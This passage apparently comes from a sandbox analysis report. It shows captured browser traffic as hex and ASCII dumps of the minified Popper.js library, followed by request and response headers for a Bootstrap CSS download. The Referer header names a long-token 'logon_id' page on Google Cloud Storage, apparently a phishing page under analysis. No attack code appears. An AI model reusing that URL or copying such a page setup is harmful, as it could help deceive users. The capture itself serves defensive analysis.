                                                                                                                                                                                2021-10-25 16:17:23 UTC20INData Raw: 3d 3d 74 79 70 65 6f 66 20 64 65 66 69 6e 65 26 26 64 65 66 69 6e 65 2e 61 6d 64 3f 64 65 66 69 6e 65 28 74 29 3a 65 2e 50 6f 70 70 65 72 3d 74 28 29 7d 29 28 74 68 69 73 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 27 75 73 65 20 73 74 72 69 63 74 27 3b 66 75 6e 63 74 69 6f 6e 20 65 28 65 29 7b 72 65 74 75 72 6e 20 65 26 26 27 5b 6f 62 6a 65 63 74 20 46 75 6e 63 74 69 6f 6e 5d 27 3d 3d 3d 7b 7d 2e 74 6f 53 74 72 69 6e 67 2e 63 61 6c 6c 28 65 29 7d 66 75 6e 63 74 69 6f 6e 20 74 28 65 2c 74 29 7b 69 66 28 31 21 3d 3d 65 2e 6e 6f 64 65 54 79 70 65 29 72 65 74 75 72 6e 5b 5d 3b 76 61 72 20 6f 3d 67 65 74 43 6f 6d 70 75 74 65 64 53 74 79 6c 65 28 65 2c 6e 75 6c 6c 29 3b 72 65 74 75 72 6e 20 74 3f 6f 5b 74 5d 3a 6f 7d 66 75 6e 63 74 69 6f 6e 20 6f 28 65 29 7b 72 65 74
                                                                                                                                                                                Data Ascii: ==typeof define&&define.amd?define(t):e.Popper=t()})(this,function(){'use strict';function e(e){return e&&'[object Function]'==={}.toString.call(e)}function t(e,t){if(1!==e.nodeType)return[];var o=getComputedStyle(e,null);return t?o[t]:o}function o(e){ret
                                                                                                                                                                                2021-10-25 16:17:23 UTC21INData Raw: 27 3a 27 73 63 72 6f 6c 6c 4c 65 66 74 27 2c 69 3d 65 2e 6e 6f 64 65 4e 61 6d 65 3b 69 66 28 27 42 4f 44 59 27 3d 3d 3d 69 7c 7c 27 48 54 4d 4c 27 3d 3d 3d 69 29 7b 76 61 72 20 6e 3d 65 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 2e 64 6f 63 75 6d 65 6e 74 45 6c 65 6d 65 6e 74 2c 72 3d 65 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 2e 73 63 72 6f 6c 6c 69 6e 67 45 6c 65 6d 65 6e 74 7c 7c 6e 3b 72 65 74 75 72 6e 20 72 5b 6f 5d 7d 72 65 74 75 72 6e 20 65 5b 6f 5d 7d 66 75 6e 63 74 69 6f 6e 20 6c 28 65 2c 74 29 7b 76 61 72 20 6f 3d 32 3c 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 26 26 76 6f 69 64 20 30 21 3d 3d 61 72 67 75 6d 65 6e 74 73 5b 32 5d 26 26 61 72 67 75 6d 65 6e 74 73 5b 32 5d 2c 69 3d 61 28 74 2c 27 74 6f 70 27 29 2c 6e 3d 61 28 74 2c 27 6c 65
                                                                                                                                                                                Data Ascii: ':'scrollLeft',i=e.nodeName;if('BODY'===i||'HTML'===i){var n=e.ownerDocument.documentElement,r=e.ownerDocument.scrollingElement||n;return r[o]}return e[o]}function l(e,t){var o=2<arguments.length&&void 0!==arguments[2]&&arguments[2],i=a(t,'top'),n=a(t,'le
                                                                                                                                                                                2021-10-25 16:17:23 UTC22INData Raw: 34 31 38 65 0d 0a 29 2c 77 69 64 74 68 3a 6d 28 27 57 69 64 74 68 27 2c 65 2c 74 2c 6f 29 7d 7d 66 75 6e 63 74 69 6f 6e 20 63 28 65 29 7b 72 65 74 75 72 6e 20 73 65 28 7b 7d 2c 65 2c 7b 72 69 67 68 74 3a 65 2e 6c 65 66 74 2b 65 2e 77 69 64 74 68 2c 62 6f 74 74 6f 6d 3a 65 2e 74 6f 70 2b 65 2e 68 65 69 67 68 74 7d 29 7d 66 75 6e 63 74 69 6f 6e 20 67 28 65 29 7b 76 61 72 20 6f 3d 7b 7d 3b 69 66 28 69 65 28 29 29 74 72 79 7b 6f 3d 65 2e 67 65 74 42 6f 75 6e 64 69 6e 67 43 6c 69 65 6e 74 52 65 63 74 28 29 3b 76 61 72 20 69 3d 61 28 65 2c 27 74 6f 70 27 29 2c 6e 3d 61 28 65 2c 27 6c 65 66 74 27 29 3b 6f 2e 74 6f 70 2b 3d 69 2c 6f 2e 6c 65 66 74 2b 3d 6e 2c 6f 2e 62 6f 74 74 6f 6d 2b 3d 69 2c 6f 2e 72 69 67 68 74 2b 3d 6e 7d 63 61 74 63 68 28 65 29 7b 7d 65 6c
                                                                                                                                                                                Data Ascii: 418e),width:m('Width',e,t,o)}}function c(e){return se({},e,{right:e.left+e.width,bottom:e.top+e.height})}function g(e){var o={};if(ie())try{o=e.getBoundingClientRect();var i=a(e,'top'),n=a(e,'left');o.top+=i,o.left+=n,o.bottom+=i,o.right+=n}catch(e){}el
                                                                                                                                                                                2021-10-25 16:17:23 UTC23INData Raw: 69 78 65 64 27 3d 3d 3d 74 28 65 2c 27 70 6f 73 69 74 69 6f 6e 27 29 7c 7c 77 28 6f 28 65 29 29 7d 66 75 6e 63 74 69 6f 6e 20 79 28 65 2c 74 2c 69 2c 72 29 7b 76 61 72 20 70 3d 7b 74 6f 70 3a 30 2c 6c 65 66 74 3a 30 7d 2c 73 3d 64 28 65 2c 74 29 3b 69 66 28 27 76 69 65 77 70 6f 72 74 27 3d 3d 3d 72 29 70 3d 62 28 73 29 3b 65 6c 73 65 7b 76 61 72 20 61 3b 27 73 63 72 6f 6c 6c 50 61 72 65 6e 74 27 3d 3d 3d 72 3f 28 61 3d 6e 28 6f 28 74 29 29 2c 27 42 4f 44 59 27 3d 3d 3d 61 2e 6e 6f 64 65 4e 61 6d 65 26 26 28 61 3d 65 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 2e 64 6f 63 75 6d 65 6e 74 45 6c 65 6d 65 6e 74 29 29 3a 27 77 69 6e 64 6f 77 27 3d 3d 3d 72 3f 61 3d 65 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 2e 64 6f 63 75 6d 65 6e 74 45 6c 65 6d 65 6e 74 3a 61
                                                                                                                                                                                Data Ascii: ixed'===t(e,'position')||w(o(e))}function y(e,t,i,r){var p={top:0,left:0},s=d(e,t);if('viewport'===r)p=b(s);else{var a;'scrollParent'===r?(a=n(o(t)),'BODY'===a.nodeName&&(a=e.ownerDocument.documentElement)):'window'===r?a=e.ownerDocument.documentElement:a
                                                                                                                                                                                2021-10-25 16:17:23 UTC24INData Raw: 65 74 75 72 6e 20 6e 7d 66 75 6e 63 74 69 6f 6e 20 78 28 65 29 7b 76 61 72 20 74 3d 7b 6c 65 66 74 3a 27 72 69 67 68 74 27 2c 72 69 67 68 74 3a 27 6c 65 66 74 27 2c 62 6f 74 74 6f 6d 3a 27 74 6f 70 27 2c 74 6f 70 3a 27 62 6f 74 74 6f 6d 27 7d 3b 72 65 74 75 72 6e 20 65 2e 72 65 70 6c 61 63 65 28 2f 6c 65 66 74 7c 72 69 67 68 74 7c 62 6f 74 74 6f 6d 7c 74 6f 70 2f 67 2c 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 74 5b 65 5d 7d 29 7d 66 75 6e 63 74 69 6f 6e 20 53 28 65 2c 74 2c 6f 29 7b 6f 3d 6f 2e 73 70 6c 69 74 28 27 2d 27 29 5b 30 5d 3b 76 61 72 20 69 3d 4c 28 65 29 2c 6e 3d 7b 77 69 64 74 68 3a 69 2e 77 69 64 74 68 2c 68 65 69 67 68 74 3a 69 2e 68 65 69 67 68 74 7d 2c 72 3d 2d 31 21 3d 3d 5b 27 72 69 67 68 74 27 2c 27 6c 65 66 74 27 5d 2e
                                                                                                                                                                                Data Ascii: eturn n}function x(e){var t={left:'right',right:'left',bottom:'top',top:'bottom'};return e.replace(/left|right|bottom|top/g,function(e){return t[e]})}function S(e,t,o){o=o.split('-')[0];var i=L(e),n={width:i.width,height:i.height},r=-1!==['right','left'].
                                                                                                                                                                                2021-10-25 16:17:23 UTC26INData Raw: 65 66 65 72 65 6e 63 65 2c 65 2e 70 6c 61 63 65 6d 65 6e 74 29 2c 65 2e 6f 66 66 73 65 74 73 2e 70 6f 70 70 65 72 2e 70 6f 73 69 74 69 6f 6e 3d 27 61 62 73 6f 6c 75 74 65 27 2c 65 3d 43 28 74 68 69 73 2e 6d 6f 64 69 66 69 65 72 73 2c 65 29 2c 74 68 69 73 2e 73 74 61 74 65 2e 69 73 43 72 65 61 74 65 64 3f 74 68 69 73 2e 6f 70 74 69 6f 6e 73 2e 6f 6e 55 70 64 61 74 65 28 65 29 3a 28 74 68 69 73 2e 73 74 61 74 65 2e 69 73 43 72 65 61 74 65 64 3d 21 30 2c 74 68 69 73 2e 6f 70 74 69 6f 6e 73 2e 6f 6e 43 72 65 61 74 65 28 65 29 29 7d 7d 66 75 6e 63 74 69 6f 6e 20 6b 28 65 2c 74 29 7b 72 65 74 75 72 6e 20 65 2e 73 6f 6d 65 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 6f 3d 65 2e 6e 61 6d 65 2c 69 3d 65 2e 65 6e 61 62 6c 65 64 3b 72 65 74 75 72 6e 20 69 26
                                                                                                                                                                                Data Ascii: eference,e.placement),e.offsets.popper.position='absolute',e=C(this.modifiers,e),this.state.isCreated?this.options.onUpdate(e):(this.state.isCreated=!0,this.options.onCreate(e))}}function k(e,t){return e.some(function(e){var o=e.name,i=e.enabled;return i&
                                                                                                                                                                                2021-10-25 16:17:23 UTC27INData Raw: 72 65 74 75 72 6e 20 42 28 65 29 2e 72 65 6d 6f 76 65 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 27 72 65 73 69 7a 65 27 2c 74 2e 75 70 64 61 74 65 42 6f 75 6e 64 29 2c 74 2e 73 63 72 6f 6c 6c 50 61 72 65 6e 74 73 2e 66 6f 72 45 61 63 68 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 72 65 6d 6f 76 65 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 27 73 63 72 6f 6c 6c 27 2c 74 2e 75 70 64 61 74 65 42 6f 75 6e 64 29 7d 29 2c 74 2e 75 70 64 61 74 65 42 6f 75 6e 64 3d 6e 75 6c 6c 2c 74 2e 73 63 72 6f 6c 6c 50 61 72 65 6e 74 73 3d 5b 5d 2c 74 2e 73 63 72 6f 6c 6c 45 6c 65 6d 65 6e 74 3d 6e 75 6c 6c 2c 74 2e 65 76 65 6e 74 73 45 6e 61 62 6c 65 64 3d 21 31 2c 74 7d 66 75 6e 63 74 69 6f 6e 20 52 28 29 7b 74 68 69 73 2e 73 74 61 74 65 2e 65 76 65 6e 74 73 45 6e 61 62 6c
                                                                                                                                                                                Data Ascii: return B(e).removeEventListener('resize',t.updateBound),t.scrollParents.forEach(function(e){e.removeEventListener('scroll',t.updateBound)}),t.updateBound=null,t.scrollParents=[],t.scrollElement=null,t.eventsEnabled=!1,t}function R(){this.state.eventsEnabl
                                                                                                                                                                                2021-10-25 16:17:23 UTC28INData Raw: 3b 7d 76 61 72 20 64 3d 63 28 73 29 3b 72 65 74 75 72 6e 20 64 5b 74 5d 2f 31 30 30 2a 72 7d 69 66 28 27 76 68 27 3d 3d 3d 70 7c 7c 27 76 77 27 3d 3d 3d 70 29 7b 76 61 72 20 61 3b 72 65 74 75 72 6e 20 61 3d 27 76 68 27 3d 3d 3d 70 3f 4a 28 64 6f 63 75 6d 65 6e 74 2e 64 6f 63 75 6d 65 6e 74 45 6c 65 6d 65 6e 74 2e 63 6c 69 65 6e 74 48 65 69 67 68 74 2c 77 69 6e 64 6f 77 2e 69 6e 6e 65 72 48 65 69 67 68 74 7c 7c 30 29 3a 4a 28 64 6f 63 75 6d 65 6e 74 2e 64 6f 63 75 6d 65 6e 74 45 6c 65 6d 65 6e 74 2e 63 6c 69 65 6e 74 57 69 64 74 68 2c 77 69 6e 64 6f 77 2e 69 6e 6e 65 72 57 69 64 74 68 7c 7c 30 29 2c 61 2f 31 30 30 2a 72 7d 72 65 74 75 72 6e 20 72 7d 66 75 6e 63 74 69 6f 6e 20 7a 28 65 2c 74 2c 6f 2c 69 29 7b 76 61 72 20 6e 3d 5b 30 2c 30 5d 2c 72 3d 2d 31
                                                                                                                                                                                Data Ascii: ;}var d=c(s);return d[t]/100*r}if('vh'===p||'vw'===p){var a;return a='vh'===p?J(document.documentElement.clientHeight,window.innerHeight||0):J(document.documentElement.clientWidth,window.innerWidth||0),a/100*r}return r}function z(e,t,o,i){var n=[0,0],r=-1
                                                                                                                                                                                2021-10-25 16:17:23 UTC30INData Raw: 66 69 6e 65 64 27 21 3d 74 79 70 65 6f 66 20 64 6f 63 75 6d 65 6e 74 2c 5a 3d 5b 27 45 64 67 65 27 2c 27 54 72 69 64 65 6e 74 27 2c 27 46 69 72 65 66 6f 78 27 5d 2c 24 3d 30 2c 65 65 3d 30 3b 65 65 3c 5a 2e 6c 65 6e 67 74 68 3b 65 65 2b 3d 31 29 69 66 28 51 26 26 30 3c 3d 6e 61 76 69 67 61 74 6f 72 2e 75 73 65 72 41 67 65 6e 74 2e 69 6e 64 65 78 4f 66 28 5a 5b 65 65 5d 29 29 7b 24 3d 31 3b 62 72 65 61 6b 7d 76 61 72 20 69 2c 74 65 3d 51 26 26 77 69 6e 64 6f 77 2e 50 72 6f 6d 69 73 65 2c 6f 65 3d 74 65 3f 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 21 31 3b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 29 7b 74 7c 7c 28 74 3d 21 30 2c 77 69 6e 64 6f 77 2e 50 72 6f 6d 69 73 65 2e 72 65 73 6f 6c 76 65 28 29 2e 74 68 65 6e 28 66 75 6e 63 74 69 6f
                                                                                                                                                                                Data Ascii: fined'!=typeof document,Z=['Edge','Trident','Firefox'],$=0,ee=0;ee<Z.length;ee+=1)if(Q&&0<=navigator.userAgent.indexOf(Z[ee])){$=1;break}var i,te=Q&&window.Promise,oe=te?function(e){var t=!1;return function(){t||(t=!0,window.Promise.resolve().then(functio
                                                                                                                                                                                2021-10-25 16:17:23 UTC31INData Raw: 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 26 26 76 6f 69 64 20 30 21 3d 3d 61 72 67 75 6d 65 6e 74 73 5b 32 5d 3f 61 72 67 75 6d 65 6e 74 73 5b 32 5d 3a 7b 7d 3b 6e 65 28 74 68 69 73 2c 74 29 2c 74 68 69 73 2e 73 63 68 65 64 75 6c 65 55 70 64 61 74 65 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 72 65 71 75 65 73 74 41 6e 69 6d 61 74 69 6f 6e 46 72 61 6d 65 28 6e 2e 75 70 64 61 74 65 29 7d 2c 74 68 69 73 2e 75 70 64 61 74 65 3d 6f 65 28 74 68 69 73 2e 75 70 64 61 74 65 2e 62 69 6e 64 28 74 68 69 73 29 29 2c 74 68 69 73 2e 6f 70 74 69 6f 6e 73 3d 73 65 28 7b 7d 2c 74 2e 44 65 66 61 75 6c 74 73 2c 72 29 2c 74 68 69 73 2e 73 74 61 74 65 3d 7b 69 73 44 65 73 74 72 6f 79 65 64 3a 21 31 2c 69 73 43 72 65 61 74 65 64 3a 21 31 2c 73 63 72 6f 6c 6c 50 61
                                                                                                                                                                                Data Ascii: uments.length&&void 0!==arguments[2]?arguments[2]:{};ne(this,t),this.scheduleUpdate=function(){return requestAnimationFrame(n.update)},this.update=oe(this.update.bind(this)),this.options=se({},t.Defaults,r),this.state={isDestroyed:!1,isCreated:!1,scrollPa
                                                                                                                                                                                2021-10-25 16:17:23 UTC32INData Raw: 74 3a 7b 6f 72 64 65 72 3a 31 30 30 2c 65 6e 61 62 6c 65 64 3a 21 30 2c 66 6e 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 65 2e 70 6c 61 63 65 6d 65 6e 74 2c 6f 3d 74 2e 73 70 6c 69 74 28 27 2d 27 29 5b 30 5d 2c 69 3d 74 2e 73 70 6c 69 74 28 27 2d 27 29 5b 31 5d 3b 69 66 28 69 29 7b 76 61 72 20 6e 3d 65 2e 6f 66 66 73 65 74 73 2c 72 3d 6e 2e 72 65 66 65 72 65 6e 63 65 2c 70 3d 6e 2e 70 6f 70 70 65 72 2c 73 3d 2d 31 21 3d 3d 5b 27 62 6f 74 74 6f 6d 27 2c 27 74 6f 70 27 5d 2e 69 6e 64 65 78 4f 66 28 6f 29 2c 64 3d 73 3f 27 6c 65 66 74 27 3a 27 74 6f 70 27 2c 61 3d 73 3f 27 77 69 64 74 68 27 3a 27 68 65 69 67 68 74 27 2c 6c 3d 7b 73 74 61 72 74 3a 70 65 28 7b 7d 2c 64 2c 72 5b 64 5d 29 2c 65 6e 64 3a 70 65 28 7b 7d 2c 64 2c 72 5b 64 5d 2b 72 5b
                                                                                                                                                                                Data Ascii: t:{order:100,enabled:!0,fn:function(e){var t=e.placement,o=t.split('-')[0],i=t.split('-')[1];if(i){var n=e.offsets,r=n.reference,p=n.popper,s=-1!==['bottom','top'].indexOf(o),d=s?'left':'top',a=s?'width':'height',l={start:pe({},d,r[d]),end:pe({},d,r[d]+r[
                                                                                                                                                                                2021-10-25 16:17:23 UTC34INData Raw: 26 26 28 65 2e 6f 66 66 73 65 74 73 2e 70 6f 70 70 65 72 5b 64 5d 3d 72 28 69 5b 73 5d 29 29 2c 65 7d 7d 2c 61 72 72 6f 77 3a 7b 6f 72 64 65 72 3a 35 30 30 2c 65 6e 61 62 6c 65 64 3a 21 30 2c 66 6e 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 6f 29 7b 76 61 72 20 69 3b 69 66 28 21 46 28 65 2e 69 6e 73 74 61 6e 63 65 2e 6d 6f 64 69 66 69 65 72 73 2c 27 61 72 72 6f 77 27 2c 27 6b 65 65 70 54 6f 67 65 74 68 65 72 27 29 29 72 65 74 75 72 6e 20 65 3b 76 61 72 20 6e 3d 6f 2e 65 6c 65 6d 65 6e 74 3b 69 66 28 27 73 74 72 69 6e 67 27 3d 3d 74 79 70 65 6f 66 20 6e 29 7b 69 66 28 6e 3d 65 2e 69 6e 73 74 61 6e 63 65 2e 70 6f 70 70 65 72 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 28 6e 29 2c 21 6e 29 72 65 74 75 72 6e 20 65 3b 7d 65 6c 73 65 20 69 66 28 21 65 2e 69 6e 73 74 61
                                                                                                                                                                                Data Ascii: &&(e.offsets.popper[d]=r(i[s])),e}},arrow:{order:500,enabled:!0,fn:function(e,o){var i;if(!F(e.instance.modifiers,'arrow','keepTogether'))return e;var n=o.element;if('string'==typeof n){if(n=e.instance.popper.querySelector(n),!n)return e;}else if(!e.insta
                                                                                                                                                                                2021-10-25 16:17:23 UTC35INData Raw: 49 53 45 3a 70 3d 71 28 69 2c 21 30 29 3b 62 72 65 61 6b 3b 64 65 66 61 75 6c 74 3a 70 3d 74 2e 62 65 68 61 76 69 6f 72 3b 7d 72 65 74 75 72 6e 20 70 2e 66 6f 72 45 61 63 68 28 66 75 6e 63 74 69 6f 6e 28 73 2c 64 29 7b 69 66 28 69 21 3d 3d 73 7c 7c 70 2e 6c 65 6e 67 74 68 3d 3d 3d 64 2b 31 29 72 65 74 75 72 6e 20 65 3b 69 3d 65 2e 70 6c 61 63 65 6d 65 6e 74 2e 73 70 6c 69 74 28 27 2d 27 29 5b 30 5d 2c 6e 3d 78 28 69 29 3b 76 61 72 20 61 3d 65 2e 6f 66 66 73 65 74 73 2e 70 6f 70 70 65 72 2c 6c 3d 65 2e 6f 66 66 73 65 74 73 2e 72 65 66 65 72 65 6e 63 65 2c 66 3d 58 2c 6d 3d 27 6c 65 66 74 27 3d 3d 3d 69 26 26 66 28 61 2e 72 69 67 68 74 29 3e 66 28 6c 2e 6c 65 66 74 29 7c 7c 27 72 69 67 68 74 27 3d 3d 3d 69 26 26 66 28 61 2e 6c 65 66 74 29 3c 66 28 6c 2e 72
                                                                                                                                                                                Data Ascii: ISE:p=q(i,!0);break;default:p=t.behavior;}return p.forEach(function(s,d){if(i!==s||p.length===d+1)return e;i=e.placement.split('-')[0],n=x(i);var a=e.offsets.popper,l=e.offsets.reference,f=X,m='left'===i&&f(a.right)>f(l.left)||'right'===i&&f(a.left)<f(l.r
                                                                                                                                                                                2021-10-25 16:17:23 UTC36INData Raw: 65 2e 6e 61 6d 65 7d 29 2e 62 6f 75 6e 64 61 72 69 65 73 3b 69 66 28 74 2e 62 6f 74 74 6f 6d 3c 6f 2e 74 6f 70 7c 7c 74 2e 6c 65 66 74 3e 6f 2e 72 69 67 68 74 7c 7c 74 2e 74 6f 70 3e 6f 2e 62 6f 74 74 6f 6d 7c 7c 74 2e 72 69 67 68 74 3c 6f 2e 6c 65 66 74 29 7b 69 66 28 21 30 3d 3d 3d 65 2e 68 69 64 65 29 72 65 74 75 72 6e 20 65 3b 65 2e 68 69 64 65 3d 21 30 2c 65 2e 61 74 74 72 69 62 75 74 65 73 5b 27 78 2d 6f 75 74 2d 6f 66 2d 62 6f 75 6e 64 61 72 69 65 73 27 5d 3d 27 27 7d 65 6c 73 65 7b 69 66 28 21 31 3d 3d 3d 65 2e 68 69 64 65 29 72 65 74 75 72 6e 20 65 3b 65 2e 68 69 64 65 3d 21 31 2c 65 2e 61 74 74 72 69 62 75 74 65 73 5b 27 78 2d 6f 75 74 2d 6f 66 2d 62 6f 75 6e 64 61 72 69 65 73 27 5d 3d 21 31 7d 72 65 74 75 72 6e 20 65 7d 7d 2c 63 6f 6d 70 75 74
                                                                                                                                                                                Data Ascii: e.name}).boundaries;if(t.bottom<o.top||t.left>o.right||t.top>o.bottom||t.right<o.left){if(!0===e.hide)return e;e.hide=!0,e.attributes['x-out-of-boundaries']=''}else{if(!1===e.hide)return e;e.hide=!1,e.attributes['x-out-of-boundaries']=!1}return e}},comput
                                                                                                                                                                                2021-10-25 16:17:23 UTC38INData Raw: 72 69 62 75 74 65 73 29 2c 65 2e 61 72 72 6f 77 45 6c 65 6d 65 6e 74 26 26 4f 62 6a 65 63 74 2e 6b 65 79 73 28 65 2e 61 72 72 6f 77 53 74 79 6c 65 73 29 2e 6c 65 6e 67 74 68 26 26 59 28 65 2e 61 72 72 6f 77 45 6c 65 6d 65 6e 74 2c 65 2e 61 72 72 6f 77 53 74 79 6c 65 73 29 2c 65 7d 2c 6f 6e 4c 6f 61 64 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6f 2c 69 2c 6e 29 7b 76 61 72 20 72 3d 4f 28 6e 2c 74 2c 65 29 2c 70 3d 76 28 6f 2e 70 6c 61 63 65 6d 65 6e 74 2c 72 2c 74 2c 65 2c 6f 2e 6d 6f 64 69 66 69 65 72 73 2e 66 6c 69 70 2e 62 6f 75 6e 64 61 72 69 65 73 45 6c 65 6d 65 6e 74 2c 6f 2e 6d 6f 64 69 66 69 65 72 73 2e 66 6c 69 70 2e 70 61 64 64 69 6e 67 29 3b 72 65 74 75 72 6e 20 74 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 27 78 2d 70 6c 61 63 65 6d 65 6e 74 27
                                                                                                                                                                                Data Ascii: ributes),e.arrowElement&&Object.keys(e.arrowStyles).length&&Y(e.arrowElement,e.arrowStyles),e},onLoad:function(e,t,o,i,n){var r=O(n,t,e),p=v(o.placement,r,t,e,o.modifiers.flip.boundariesElement,o.modifiers.flip.padding);return t.setAttribute('x-placement'
                                                                                                                                                                                2021-10-25 16:17:23 UTC38INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                4192.168.2.349754104.18.10.207443C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                                                2021-10-25 16:17:23 UTC38OUTGET /bootstrap/4.0.0/css/bootstrap.min.css HTTP/1.1
                                                                                                                                                                                Host: maxcdn.bootstrapcdn.com
                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                Origin: https://00f74ba44bb50aa58a9dfd79647238a8f996daa403-apidata.googleusercontent.com
                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36
                                                                                                                                                                                Accept: text/css,*/*;q=0.1
                                                                                                                                                                                Sec-Fetch-Site: cross-site
                                                                                                                                                                                Sec-Fetch-Mode: cors
                                                                                                                                                                                Sec-Fetch-Dest: style
                                                                                                                                                                                Referer: https://00f74ba44bb50aa58a9dfd79647238a8f996daa403-apidata.googleusercontent.com/download/storage/v1/b/logon_id63757945b-32c6-49b0-83e6-1d93765276e7/o/index.html?jk=AFshE3VcvfzNdf-7zMKWd94-4dMrNIkOLLE47CQ43PY7P2MYpfKpiTisbCiM8ITDVUzsV5uBnwUTgNfImCvdn95XFg7yLPb4pK7mGtnykL6H73onzrS0TNqkpgxfmCGl9SjrMUh2HXQovXq0n_fa5hqbVlcfrBGOpBCkBBOuoY-yrNdFJA6qsh5mXJeZJEWhpyesRFni67jgONcRuOW0IhE2TSFjfiZ1kcHtUg4IakFROfuF2ixmgmZ0cygvwFJgzltWAi4BZy9gK7vN7kuIcB7IqaENeixO24771GkuNYSmkiDTJACa0r0VCNPcQlcK5lGRRAu7CmqBicTQElQR1sT8UAlS8qEccylxwvHxtG1ZQipoKLv7jRTmXa5gKf9qryarS-JmN2Dw-wvzqjvQU3ACMffC05IslAl45AuBr7XJD_AvOH4XV0oB1K69D_BJqrPx5F866tHjL87vL2OzmhOn2ZN6fGK9EaMH6l71egHyEMNh69wwpAccwpkljLmJNVIqygOVxaM5girr-FZHO5mJNqOa9bTFJMZFMQk75Bh1YPELgAun31aycC9L1gEIgi9xS2AI2BDHPNQB6OaElZLJZDJIsOs0jHoqoRQa-BsTDGYlSbZcoI1h5QuM3VxHMbmAZYEyCbHgEmb6QFG4Do70MelMz0hmqK1LB3zOLUGQVyL1NduEuvkLQPWtxDQ3Zeb-GyuldZGFe6ZOCmXUvu2OKrXBBFC3a0i4Io1wftvhtL1urvwaLVPFECoQBACGCtpQtZ45u5bBlHyHOYGrix_HPHteuU8UlCF1QPHHFIVg5XjWbBd9deixk_udmpRBTRN6b7-93o-J_Lga6iMebvzrAh6z2qFEd8YAqgMmCaIpY3uuMGkMbvjX_71pF2dS6_eUeo82_XpG60fSB3QZnvV0oMGUvZu6gOHeues8gSXLQCwqfhwa_7AgDj94Gv_4jjp6oSobCikZNfcIVBrhso8uTX4sUJ5X9GsLxXBisRNqpQ&isca=1
                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                2021-10-25 16:17:23 UTC41INHTTP/1.1 200 OK
                                                                                                                                                                                Date: Mon, 25 Oct 2021 16:17:23 GMT
                                                                                                                                                                                Content-Type: text/css; charset=utf-8
                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                Connection: close
                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                CDN-PullZone: 252412
                                                                                                                                                                                CDN-Uid: b1941f61-b576-4f40-80de-5677acb38f74
                                                                                                                                                                                CDN-RequestCountryCode: DE
                                                                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                                                                Cache-Control: public, max-age=31919000
                                                                                                                                                                                Last-Modified: Mon, 25 Jan 2021 22:04:04 GMT
                                                                                                                                                                                CDN-CachedAt: 08/11/2021 06:00:03
                                                                                                                                                                                CDN-EdgeStorageId: 756
                                                                                                                                                                                CDN-RequestPullCode: 200
                                                                                                                                                                                CDN-RequestPullSuccess: True
                                                                                                                                                                                timing-allow-origin: *
                                                                                                                                                                                cross-origin-resource-policy: cross-origin
                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                CDN-Status: 200
                                                                                                                                                                                CDN-ProxyVer: 1.0
                                                                                                                                                                                CDN-RequestId: 33e3687db69c8d2ed9ad4de2ee3409a2
                                                                                                                                                                                CDN-Cache: HIT
                                                                                                                                                                                CF-Cache-Status: MISS
                                                                                                                                                                                Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
                                                                                                                                                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                CF-RAY: 6a3cc1381a2416ea-FRA
                                                                                                                                                                                alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
